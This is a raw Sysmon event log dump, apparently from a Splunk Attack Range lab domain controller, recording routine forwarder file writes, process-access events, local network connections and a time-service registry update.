Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6491E1BAA5BEAFB4D614D021BA495B28,SHA256=B879B4BE47F3424CDED74797C4FFA312F4AB4376D41801E16AF2054CE56FEC0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:33.419{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF093F7C3A53170FCFA2F65FC1C53356,SHA256=FE56E73A98CA2D952296E1F8FBF3F46610B6055911090D532A18A2025C088161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:34.435{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0482D2415EEE5625F0BA1D435FE15261,SHA256=D140885A91BE14515728CFF3E5D6D200308FC87B9351C5170C8596B4433B3AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08DA7BDE2DF9E0319278C326B8340ED4,SHA256=221C379E9B64037B008771E2241D338204AD1EAF3703666F2A666B411CA0E764,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:36.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0810FEB67D090498D29A86A94A2E119F,SHA256=FA344EA2FE6EB55CE715F32440D40C96C50EFC08BF09136C6AE1DAA7B9933434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:37.481{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130DCD0029584E6E83F8A8C9517C0AB1,SHA256=6E65A6E697B7B3734884A96AF2A67F1E8326536BE8769043BD1331CDC9D694CD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000011439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:10:37.341{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xdc10ab43) 23542300x800000000000000011441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:38.528{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47E0298DAB50A61AC7C4B74EC7314877,SHA256=22489B167C1253364298CF13DF54C4BE5AE6FFBB44E0A8A5E702F57CDEA44CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:39.543{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA0E3DD1A345D22AA9C3A189B3922533,SHA256=B369CB0F201762D471CE0B8CCCBE8DA2061EC9BCB0F24C97E2CCC064234608C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:37.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53726-false10.0.1.12-8000- 23542300x800000000000000011444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:40.622{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9590C909773B2DE28131F4AD63F62BD5,SHA256=9D0BFB5350AEAFCA94910C38A5589951BEFDF7CB15410C58AD88DB79AD4EB626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:41.684{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8885176D27CCB9DA8E99237AD3C286B,SHA256=9B72B74C3558103ABAA5B0C4382925F6ACCE9ACD727866DB97D911709ACC78A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:42.699{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34CE686DCF496990EBD4F6F150658044,SHA256=CC2984846D2D5E561EE7AE33D20E2E15DAE0311FDDFEE545640543F799DB26C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:42.590{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000011450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.746{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80DFE02D269C516F256394BA3B874DB,SHA256=8ECDC0BE7AA9C97A4CAF1A5D2DBFF58A3A28C73ADBF3A3CDE67F4CBE339E1223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.668{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A80D9B4AD5949BF29894BF1C5657A7,SHA256=6AE46E6F65A933E9209809BD89B61087CB1E629AB56C694701B50FB6E0D79817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.668{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E8AD742025FEB47D154E38BCB47C1B6,SHA256=DC968949EFAEC12B2DB17204A0399B90370119346E56BB515A79DD014FE5463B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A14E63A2AF403EC4684BBFDFD3789F3,SHA256=57E3F73CF2D2F17643335625330E02612C67B00FEF2B7DCBDFB7D48BDA38B970,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000011458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.012{266CAFBE-646C-6064-1100-00000000AE01}1200WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x800000000000000011457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1000-00000000AE01}11246856C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1000-00000000AE01}11246856C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x800000000000000011455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000011454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.481{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3012B9B1FBC6FCBEC0ED8909DDEDD40A,SHA256=9EC0603A62C82F9D09F640305118099A6469C2BC0EECCF9AD3EF85105784BD59,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.007{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000011452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.007{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53728-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x800000000000000011451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:42.646{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53727-false10.0.1.12-8000- 23542300x800000000000000011462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.918{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939CC125D46A65DB8D5B337E364D7A05,SHA256=22FE59F5EEEEFD611E4558BDB974257D0FEE18C030AA0A38C32BAE6412377F09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.699{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:45.699{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:46.965{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33127CD314A5D5EA0744047444F5117,SHA256=C2F50900D72D65B2AA5AAAC1D82BF654973A4221452ACEF249B4CE93B7E1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:47.980{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2920C60F93B15C508DF4659F585F06,SHA256=A9842630FF7F9BB22DF5655C3749D8E0A62C44F2201FA022BE67F053B28C94CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:48.965{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:48.568{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53729-false10.0.1.12-8000- 23542300x800000000000000011466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:49.058{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C3055FC25276EBD22B0A733EF80376,SHA256=C60B89E7FB50FD6C37713D68BB35E6989059B3A4186072FB90BAFB37075DF54B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:49.365{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53730-false10.0.1.12-8089- 10341000x800000000000000011492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 